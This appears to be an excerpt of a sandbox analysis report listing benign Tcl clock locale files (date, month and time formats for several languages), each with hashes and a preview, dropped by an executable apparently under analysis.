                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xo06GriSFjoeW3v6ry/5o06T+3vrig6HyFvn:4EnLB383gG+263v6ry/gK3v+lSVn
                                                                                                                                                                                                                                            MD5:CE811BB8D12C7E6D53338759CCFB0A22
                                                                                                                                                                                                                                            SHA1:0AED290AA479DE6887CCB58D3F0A0F379EF8D558
                                                                                                                                                                                                                                            SHA-256:F790E8E48DC079DCD7DEB58170561006A31294F7E4ACBF9CF2ABFA3DB9E3FA9E
                                                                                                                                                                                                                                            SHA-512:0C73654CC3D33F76D9BF545BD6C5E42CBDD10B6D9750BFD6536806010F3B6A3C3647FB9D5E7E75A39823FDB857E13D07B7F987809C94B9F980E6D3A6D3108E85
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_PR DATE_FORMAT "%m-%d-%Y".. ::msgcat::mcset es_PR TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_PR DATE_TIME_FORMAT "%m-%d-%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.917539255090736
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xo/5zvFjovE3v6ry/5o/a+3v9f6HyFvn:4EnLB383Czdt3v6ry/+3vMSVn
                                                                                                                                                                                                                                            MD5:9CD6FAC4121E3D287C87157142E32845
                                                                                                                                                                                                                                            SHA1:3081FE2197017EC8E052756A407880C1C4ED026A
                                                                                                                                                                                                                                            SHA-256:70263F7EB22822DFEE8849B7AC4418ED9331275A71E77236B59226396505CDFF
                                                                                                                                                                                                                                            SHA-512:25DC054085C4078734988EEDD87E31ABE93DA8B43512E924DE4BCDE9F8EC670436B72FAD1855484F9AC71DD0BEDD9ED30304D02219C4FFC4B0516D8889BDF9F9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_PY DATE_FORMAT "%d/%m/%Y".. ::msgcat::mcset es_PY TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_PY DATE_TIME_FORMAT "%d/%m/%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.929035824905457
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xofriSFjo3+3v6ry/5oY+3vrig6HyFvn:4EnLB383Y+22+3v6ry/Q3v+lSVn
                                                                                                                                                                                                                                            MD5:AF300EA6E733DC6820768EA16194B472
                                                                                                                                                                                                                                            SHA1:7766A6EB3D07BCC759CF6718EF3D6EC3FCE13565
                                                                                                                                                                                                                                            SHA-256:26A38B3745C95673D21BABB987F1D41EE08DDA945C670F5432BA0CE6F893C0E9
                                                                                                                                                                                                                                            SHA-512:C38D67C912584BE539D71881C6517AC186CBB336A160602DA716CE2708B2D38CE8FA7DD23EDB98890ABB7119B924B6C7816C18EC18F20C49D6284DF2386E32EE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_SV DATE_FORMAT "%m-%d-%Y".. ::msgcat::mcset es_SV TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_SV DATE_TIME_FORMAT "%m-%d-%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.923802447598272
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xooygzvFjooq9X3v6ry/5ooy9+3v9f6HyFvn:4EnLB3835rzdbsX3v6ry/5J3vMSVn
                                                                                                                                                                                                                                            MD5:2DC550FEC3F477B1159B824479BCE707
                                                                                                                                                                                                                                            SHA1:4D0B20CF3E50B64D74655A405A7750E0B0BB4375
                                                                                                                                                                                                                                            SHA-256:1291B58810739EA0651493DD7887F5EE3E14BDB806E06DD4BB8AE2520C742EDA
                                                                                                                                                                                                                                            SHA-512:B12B927ACA6274904928A6A6CAEC8339A794C74A1F1804FF93AABC132AF9AD8AC5117F20067A60EFEBC9887150D7ACA5BE9643FF61509666011FD203211C25B9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_UY DATE_FORMAT "%d/%m/%Y".. ::msgcat::mcset es_UY TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_UY DATE_TIME_FORMAT "%d/%m/%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.928484426267027
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoXrzvFjoXK3v6ry/5oXs+3v9f6HyFvn:4EnLB3838zdv3v6ry/c3vMSVn
                                                                                                                                                                                                                                            MD5:184D6C4B9F0AA874DEB959F63F7CC01B
                                                                                                                                                                                                                                            SHA1:5FB370B498289590C977F6B489FF646F0FB27425
                                                                                                                                                                                                                                            SHA-256:91191517403C712299919F9C797F952502E33CB6961D1DBEE3A7C9E8D2B170B9
                                                                                                                                                                                                                                            SHA-512:881CCAB0950AE993744ECCA141120C005F53D684167A3E5CBDDF950D110D630FB2B4F6AE6E3D0E06D5110AE25EA00A4F4DAFB03AD3B227DC8C63464D434431DA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_VE DATE_FORMAT "%d/%m/%Y".. ::msgcat::mcset es_VE TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_VE DATE_TIME_FORMAT "%d/%m/%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1258
                                                                                                                                                                                                                                            Entropy (8bit):4.391217201307309
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83P1Y2+1YoQVTsC/m48qpRTVTR7I/68qqq4Z0yoN7emG5wsvtqmsv5t:43P1p+1jQ9sq8y9v8Yko7emG5wKtqmKX
                                                                                                                                                                                                                                            MD5:C8C5EF2FA6DD8DBD5BBD2699BE1A0BF6
                                                                                                                                                                                                                                            SHA1:F5E26B40786B8987C98F9CBDEF5522043574A9ED
                                                                                                                                                                                                                                            SHA-256:4BEE224C21B0483CFF39BE145C671AA20CB7872C8727FD918C0E8ECA2BBEB172
                                                                                                                                                                                                                                            SHA-512:757FA85C137A11C1A3F4A8392C7A4E4030A67D0E593FA25A98BEC07DB295399AB2C0D9EBE61E07420B14387A29C060DC3AF812A1E7B85110DBB13C3C3DCB3600
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset et DAYS_OF_WEEK_ABBREV [list \.. "P"\.. "E"\.. "T"\.. "K"\.. "N"\.. "R"\.. "L"].. ::msgcat::mcset et DAYS_OF_WEEK_FULL [list \.. "p\u00fchap\u00e4ev"\.. "esmasp\u00e4ev"\.. "teisip\u00e4ev"\.. "kolmap\u00e4ev"\.. "neljap\u00e4ev"\.. "reede"\.. "laup\u00e4ev"].. ::msgcat::mcset et MONTHS_ABBREV [list \.. "Jaan"\.. "Veebr"\.. "M\u00e4rts"\.. "Apr"\.. "Mai"\.. "Juuni"\.. "Juuli"\.. "Aug"\.. "Sept"\.. "Okt"\.. "Nov"\.. "Dets"\.. ""].. ::msgcat::mcset et MONTHS_FULL [list \.. "Jaanuar"\.. "Veebruar"\.. "M\u00e4rts"\.. "Aprill"\.. "Mai"\.. "Juuni"\.. "Juuli"\.. "August"\.. "September"\.. "Oktoober"\.. "November"\.. "De
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1032
                                                                                                                                                                                                                                            Entropy (8bit):4.002617252503668
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83DEXk8TT7vXk8TTMtzCIsOo/ssP6tvf1I49sHT:434bTbbTc+RjKi4mz
                                                                                                                                                                                                                                            MD5:ED9805AF5BFB54EB28C6CB3975F86F5B
                                                                                                                                                                                                                                            SHA1:2BD91BD850028712F35A2DDB2555036FBF6E8114
                                                                                                                                                                                                                                            SHA-256:6889B57D29B670C6CFB7B5A3F2F1749D12C802E8E9629014D06CE23C034C7EF1
                                                                                                                                                                                                                                            SHA-512:16F31DE5D2B0D3ED2D975C7891C73C48F073CDAC28F17572FC9424C2D384DDFE9E5E235F17C788F42840CB2D819D2D9499B909AB80FEF1B09F2AE1627CF1DADC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset eu DAYS_OF_WEEK_ABBREV [list \.. "igandea"\.. "astelehena"\.. "asteartea"\.. "asteazkena"\.. "osteguna"\.. "ostirala"\.. "larunbata"].. ::msgcat::mcset eu DAYS_OF_WEEK_FULL [list \.. "igandea"\.. "astelehena"\.. "asteartea"\.. "asteazkena"\.. "osteguna"\.. "ostirala"\.. "larunbata"].. ::msgcat::mcset eu MONTHS_ABBREV [list \.. "urt"\.. "ots"\.. "mar"\.. "api"\.. "mai"\.. "eka"\.. "uzt"\.. "abu"\.. "ira"\.. "urr"\.. "aza"\.. "abe"\.. ""].. ::msgcat::mcset eu MONTHS_FULL [list \.. "urtarrila"\.. "otsaila"\.. "martxoa"\.. "apirila"\.. "maiatza"\.. "ekaina"\.. "uztaila"\.. "abuztua"\.. "iraila"\.. "urria"\.. "azaroa"\..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):294
                                                                                                                                                                                                                                            Entropy (8bit):4.915392589807169
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoszFnJF+l6VvBoszw3vLjoszw3v6mjosz++3v/RHvn:4EnLB383FL+l6VQ3vO3v6G3vZPn
                                                                                                                                                                                                                                            MD5:4C91AA000D4316585893025CBB96E910
                                                                                                                                                                                                                                            SHA1:3D4E73839A1A8CB9DEC1E59D9D2813257D9480F0
                                                                                                                                                                                                                                            SHA-256:D45CC432E5743E6CEC34E9A1E0F91A9D5C315CDA409E0826B51AD9D908479EB6
                                                                                                                                                                                                                                            SHA-512:0731F2EEB22ADC7EF8AF215B9EB4C5A66B33BC90E4F80CF7AA482AD002CB30543547230124A0507EC79EDDD6903A042EDA5D7C8AFD77F7FC994EFC6853FABB05
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset eu_ES DATE_FORMAT "%a, %Yeko %bren %da".. ::msgcat::mcset eu_ES TIME_FORMAT "%T".. ::msgcat::mcset eu_ES TIME_FORMAT_12 "%T".. ::msgcat::mcset eu_ES DATE_TIME_FORMAT "%y-%m-%d %T %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1711
                                                                                                                                                                                                                                            Entropy (8bit):4.21837106187395
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83CnMqnbxbGwgjSyiY/Xw2mS1yM/8ye48YyfNqTb2gyj/8yHkQp:43Yzyhgvs9yi4P
                                                                                                                                                                                                                                            MD5:7AB25F4E7E457469DC61A33176B3AA72
                                                                                                                                                                                                                                            SHA1:EEA98283D250A99E33DD4D5D9B1B76A029716CE6
                                                                                                                                                                                                                                            SHA-256:86898728B275288693B200568DC927C3FF5B9050690876C4441A8339DAE06386
                                                                                                                                                                                                                                            SHA-512:7524437F91E91751BEB7A378D7674C49E5D84B716FE962F4C23580C46A671F3F33638FCD37A8F90C86E24DA8F54448E06AC9C3AEFFB5613E94A04E512C1AD68D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset fa DAYS_OF_WEEK_ABBREV [list \.. "\u06cc\u2214"\.. "\u062f\u2214"\.. "\u0633\u2214"\.. "\u0686\u2214"\.. "\u067e\u2214"\.. "\u062c\u2214"\.. "\u0634\u2214"].. ::msgcat::mcset fa DAYS_OF_WEEK_FULL [list \.. "\u06cc\u06cc\u200c\u0634\u0646\u0628\u0647"\.. "\u062f\u0648\u0634\u0646\u0628\u0647"\.. "\u0633\u0647\u200c\u0634\u0646\u0628\u0647"\.. "\u0686\u0647\u0627\u0631\u0634\u0646\u0628\u0647"\.. "\u067e\u0646\u062c\u200c\u0634\u0646\u0628\u0647"\.. "\u062c\u0645\u0639\u0647"\.. "\u0634\u0646\u0628\u0647"].. ::msgcat::mcset fa MONTHS_ABBREV [list \.. "\u0698\u0627\u0646"\.. "\u0641\u0648\u0631"\.. "\u0645\u0627\u0631"\.. "\u0622\u0648\u0631"\.. "\u0645\u0640\u0647"\.. "\u0698\u0648\u0646"\.. "\u0698\u0648\u06cc"\.. "\u0627\u0648\u062a
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2009
                                                                                                                                                                                                                                            Entropy (8bit):4.491667766230948
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83KnMqnbxbGUgjDiY/Xw2mS1yM/8ye48tfNqTb2gyj/8yHkQLoRv9v/vNv0P:43wihgvsai4Rmv53JU
                                                                                                                                                                                                                                            MD5:C59EE7CA80AD9F612A21C8B6674A820E
                                                                                                                                                                                                                                            SHA1:AEFD631EFC1892063244FA622DE1A091C461E370
                                                                                                                                                                                                                                            SHA-256:6B56545C1AE1DE53BC2389BB7AE59F115BADE24F907E384E079491DC77D6541D
                                                                                                                                                                                                                                            SHA-512:42F52091480599D317FB80DF8E52A6C6F88614C6172BF4033974DD136FB30E6F47D38982C8A7BC14CF3165C3EBAE3680F94DF3A0ED079AB68165286251CD0BD7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset fa_IN DAYS_OF_WEEK_ABBREV [list \.. "\u06cc\u2214"\.. "\u062f\u2214"\.. "\u0633\u2214"\.. "\u0686\u2214"\.. "\u067e\u2214"\.. "\u062c\u2214"\.. "\u0634\u2214"].. ::msgcat::mcset fa_IN DAYS_OF_WEEK_FULL [list \.. "\u06cc\u06cc\u200c\u0634\u0646\u0628\u0647"\.. "\u062f\u0648\u0634\u0646\u0628\u0647"\.. "\u0633\u0647\u200c\u0634\u0646\u0628\u0647"\.. "\u0686\u0647\u0627\u0631\u0634\u0646\u0628\u0647"\.. "\u067e\u0646\u062c\u200c\u0634\u0646\u0628\u0647"\.. "\u062c\u0645\u0639\u0647"\.. "\u0634\u0646\u0628\u0647"].. ::msgcat::mcset fa_IN MONTHS_ABBREV [list \.. "\u0698\u0627\u0646"\.. "\u0641\u0648\u0631"\.. "\u0645\u0627\u0631"\.. "\u0622\u0648\u0631"\.. "\u0645\u0640\u0647"\.. "\u0698\u0648\u0646"\.. "\u0698\u0648\u06cc"\.. "\u0627\u0
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):426
                                                                                                                                                                                                                                            Entropy (8bit):5.12739029869254
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:4EnLB383D2WGz7A/3vy3v6TANCmK3vz7AAbn:4aR83DoPivkvFk5vPN
                                                                                                                                                                                                                                            MD5:9778A7C3ABD37ECBEC0BB9715E52FAF8
                                                                                                                                                                                                                                            SHA1:D8063CA7779674EB1D9FE3E4B4774DB20B93038B
                                                                                                                                                                                                                                            SHA-256:3D9779C27E8960143D00961F6E82124120FD47B7F3CB82DB3DF21CDD9090C707
                                                                                                                                                                                                                                            SHA-512:B90B4A96CE5E8B9BF512B98C406603C60EA00F6740D04CD1FC30810C7155A37851AE5E28716F959137806F1A9E3152D2A0D79B8EA7E681A0737A28593657DE66
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset fa_IR AM "\u0635\u0628\u062d".. ::msgcat::mcset fa_IR PM "\u0639\u0635\u0631".. ::msgcat::mcset fa_IR DATE_FORMAT "%d\u2044%m\u2044%Y".. ::msgcat::mcset fa_IR TIME_FORMAT "%S:%M:%H".. ::msgcat::mcset fa_IR TIME_FORMAT_12 "%S:%M:%l %P".. ::msgcat::mcset fa_IR DATE_TIME_FORMAT "%d\u2044%m\u2044%Y %S:%M:%H %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1195
                                                                                                                                                                                                                                            Entropy (8bit):4.32217771842326
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83KTvIhmuw4tW/UWJTttWKeqA+3ewvtyv3e6:43YvIwuw4t05ttnlzt0p
                                                                                                                                                                                                                                            MD5:CC06F0ABD8F985654DAD8256598EBCB7
                                                                                                                                                                                                                                            SHA1:71C880F9F395ACD32AF7F538033211F392F83645
                                                                                                                                                                                                                                            SHA-256:9929A6B7139BD7E0F29487F7888A83E4C4F5E9CE0352738CFCA94EE2DDF3BD6B
                                                                                                                                                                                                                                            SHA-512:E1292665270B6FBF7738CC3864B55194E7B827C6AD9492FB2E54DC1B626159B243052CE502335B9D92E2B8F58A4DD1FA0E628CB6A9D1D3A652FE2B93A3FB711A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset fi DAYS_OF_WEEK_ABBREV [list \.. "su"\.. "ma"\.. "ti"\.. "ke"\.. "to"\.. "pe"\.. "la"].. ::msgcat::mcset fi DAYS_OF_WEEK_FULL [list \.. "sunnuntai"\.. "maanantai"\.. "tiistai"\.. "keskiviikko"\.. "torstai"\.. "perjantai"\.. "lauantai"].. ::msgcat::mcset fi MONTHS_ABBREV [list \.. "tammi"\.. "helmi"\.. "maalis"\.. "huhti"\.. "touko"\.. "kes\u00e4"\.. "hein\u00e4"\.. "elo"\.. "syys"\.. "loka"\.. "marras"\.. "joulu"\.. ""].. ::msgcat::mcset fi MONTHS_FULL [list \.. "tammikuu"\.. "helmikuu"\.. "maaliskuu"\.. "huhtikuu"\.. "toukokuu"\.. "kes\u00e4kuu"\.. "hein\u00e4kuu"\.. "elokuu"\.. "syyskuu"\.. "lokakuu"\.. "marraskuu"\..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1033
                                                                                                                                                                                                                                            Entropy (8bit):4.15884265510429
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR834YPxTSBFSa+E6rIsmYmyAxyIQbXHU92W1T:43a6rIyAE0B
                                                                                                                                                                                                                                            MD5:5D224E66FD9521CA4327D4F164CD6585
                                                                                                                                                                                                                                            SHA1:FC8F4C1D9A69931679028DE02155D96A18F6542E
                                                                                                                                                                                                                                            SHA-256:2EC9B03469FA38B260915C93318F446EA5E12B9090BD441936B57552EBA1E3C9
                                                                                                                                                                                                                                            SHA-512:0E0F97D99F0274A8A92AA7DC992B252A0BB696D69A8835602D8F4C03A6A15780F45971F00863436949CD81AD7DF6EE6BC463CE5B9FECF5E39508BA4D4E83C693
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset fo DAYS_OF_WEEK_ABBREV [list \.. "sun"\.. "m\u00e1n"\.. "t\u00fds"\.. "mik"\.. "h\u00f3s"\.. "fr\u00ed"\.. "ley"].. ::msgcat::mcset fo DAYS_OF_WEEK_FULL [list \.. "sunnudagur"\.. "m\u00e1nadagur"\.. "t\u00fdsdagur"\.. "mikudagur"\.. "h\u00f3sdagur"\.. "fr\u00edggjadagur"\.. "leygardagur"].. ::msgcat::mcset fo MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "mai"\.. "jun"\.. "jul"\.. "aug"\.. "sep"\.. "okt"\.. "nov"\.. "des"\.. ""].. ::msgcat::mcset fo MONTHS_FULL [list \.. "januar"\.. "februar"\.. "mars"\.. "apr\u00edl"\.. "mai"\.. "juni"\.. "juli"\.. "august"\.. "september"\.. "oktober"\.. "november"\..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):286
                                                                                                                                                                                                                                            Entropy (8bit):4.864028070948858
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoZA4WjoZd3vLjoZd3v6mjoZd+3vnFDoAkvn:4EnLB3831P23vS3v6u3v9dmn
                                                                                                                                                                                                                                            MD5:92E2B6483B2374817548F4EAA1731820
                                                                                                                                                                                                                                            SHA1:071E1E9368CCB4EC864E78622B2113F460920203
                                                                                                                                                                                                                                            SHA-256:C3DCCF5E5904C24D4AD9AAA36160A78F5397A7452510C0C0E61DE4DE863305CB
                                                                                                                                                                                                                                            SHA-512:E79D4D38A22298252FA46D15C383CFB2A1E49E8196C265A58F9BA4982DFD9CE29E87C0B85BE3F39617359451831B792FCD3092A52EDF8FFD999AFE5CFE1D170D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset fo_FO DATE_FORMAT "%d/%m-%Y".. ::msgcat::mcset fo_FO TIME_FORMAT "%T".. ::msgcat::mcset fo_FO TIME_FORMAT_12 "%T".. ::msgcat::mcset fo_FO DATE_TIME_FORMAT "%a %d %b %Y %T %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1257
                                                                                                                                                                                                                                            Entropy (8bit):4.383721663740675
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR835LzAX2t6KOkPwzZIGzRmzQf1waGqHvivh:43mlwIFZtA/qPkh
                                                                                                                                                                                                                                            MD5:4D63B4A7CF13A28A6F6784B5597EEF43
                                                                                                                                                                                                                                            SHA1:FE1B35A93CB72666D7D6BC37D9BE081B05A00CD9
                                                                                                                                                                                                                                            SHA-256:96B1E1E12CD13A56722EBF27D362C70B467342FA1282A40B89FB16B5105A0480
                                                                                                                                                                                                                                            SHA-512:5647CAE859B62C7CE1CEE6426A076361D2A29EFE6B6F311DDC0E7D006194BA68D575852FEC5FDE2AB43DF8AE440C57013D32A3951095CB856327070FD9BD1C76
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset fr DAYS_OF_WEEK_ABBREV [list \.. "dim."\.. "lun."\.. "mar."\.. "mer."\.. "jeu."\.. "ven."\.. "sam."].. ::msgcat::mcset fr DAYS_OF_WEEK_FULL [list \.. "dimanche"\.. "lundi"\.. "mardi"\.. "mercredi"\.. "jeudi"\.. "vendredi"\.. "samedi"].. ::msgcat::mcset fr MONTHS_ABBREV [list \.. "janv."\.. "f\u00e9vr."\.. "mars"\.. "avr."\.. "mai"\.. "juin"\.. "juil."\.. "ao\u00fbt"\.. "sept."\.. "oct."\.. "nov."\.. "d\u00e9c."\.. ""].. ::msgcat::mcset fr MONTHS_FULL [list \.. "janvier"\.. "f\u00e9vrier"\.. "mars"\.. "avril"\.. "mai"\.. "juin"\.. "juillet"\.. "ao\u00fbt"\.. "septembre"\.. "octobre"\.. "novembre"\.. "d\u00e9cembre
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):286
                                                                                                                                                                                                                                            Entropy (8bit):4.910112619660625
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoXqyFjoIX3vLjoIX3v6mjog+3vnFDoAkvn:4EnLB383AqWv3vL3v6d3v9dmn
                                                                                                                                                                                                                                            MD5:07EEADB8C2F2425FF9A27E46A81827A2
                                                                                                                                                                                                                                            SHA1:AA18A651C64098C7885F1F869B9F221453F42987
                                                                                                                                                                                                                                            SHA-256:AAD828BCBB512FBD9902DCDD3812247A74913CC574DEB07DA95A7BBE74B1FE48
                                                                                                                                                                                                                                            SHA-512:1FA60B1A69B2F5FD2C009EC18695A937C4484D7C418F7E8398D95723B857698143E0584A546F9032B75894730CBBEF78453061AC13D90199FF702E148D983C28
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset fr_BE DATE_FORMAT "%d/%m/%y".. ::msgcat::mcset fr_BE TIME_FORMAT "%T".. ::msgcat::mcset fr_BE TIME_FORMAT_12 "%T".. ::msgcat::mcset fr_BE DATE_TIME_FORMAT "%a %d %b %Y %T %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):286
                                                                                                                                                                                                                                            Entropy (8bit):4.890376345610709
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xooIso13vLjo13v6mjo1+3vnFDoAkvn:4EnLB383vIF3vU3v6A3v9dmn
                                                                                                                                                                                                                                            MD5:2F70BDDE7685E2892C5F79C632FC2F0F
                                                                                                                                                                                                                                            SHA1:FD1A6F6042E59D1563ABB5858C348C1D785C435E
                                                                                                                                                                                                                                            SHA-256:0624DF9A56723DDB89E59736C20A5837DEA2206A789EBE7EEF19AD287590CA45
                                                                                                                                                                                                                                            SHA-512:50FC0C91AB2C75FFC4F100C0D42DFC4B2101DB9713FD77E6FF5BF3F25A0AF4A535A4709CF4586809CEEE76C25B66ABC0DD4FD61524510C57AA0E63EA8F46E8D5
                                                                                                                                                                                                                                            Malicious:false
